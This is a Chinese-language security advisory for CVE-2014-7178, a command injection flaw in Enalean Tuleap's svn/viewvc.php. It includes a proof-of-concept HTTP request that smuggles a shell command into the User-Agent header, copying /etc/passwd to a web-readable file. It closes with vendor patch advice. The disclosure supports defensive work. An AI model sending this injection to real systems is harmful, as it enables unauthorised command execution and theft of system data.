Enalean Tuleap 'svn/viewvc.php'远程命令执行漏洞
发布日期:2014-10-28
更新日期:2014-10-29
受影响系统:enalean Tuleap <= 7.4.99.5
描述:
BUGTRAQ ID:
70769
CVE(CAN) ID:
CVE-2014-7178
Enalean Tuleap是开源的软件开发管理套装。
Enalean Tuleap 7.4.99.5及之前版本没有验证SVN处理页所接收的请求格式,不确定passthru()函数是否引入了可以执行的其他参数,攻击者可利用此漏洞在应用的工作流内加入外部命令,并在受影响应用上下文中执行任意命令。
<*来源:Jerzy Kramarz
链接:
http://packetstormsecurity.com/files/128877/Tuleap-7.4.99.5-Remote-Command-Execution.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jerzy Kramarz ()提供了如下测试方法:
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0
建议:
厂商补丁:
enalean
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://www.enalean.com/en
参考:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/浏览次数:4022
严重程度:0(网友投票)
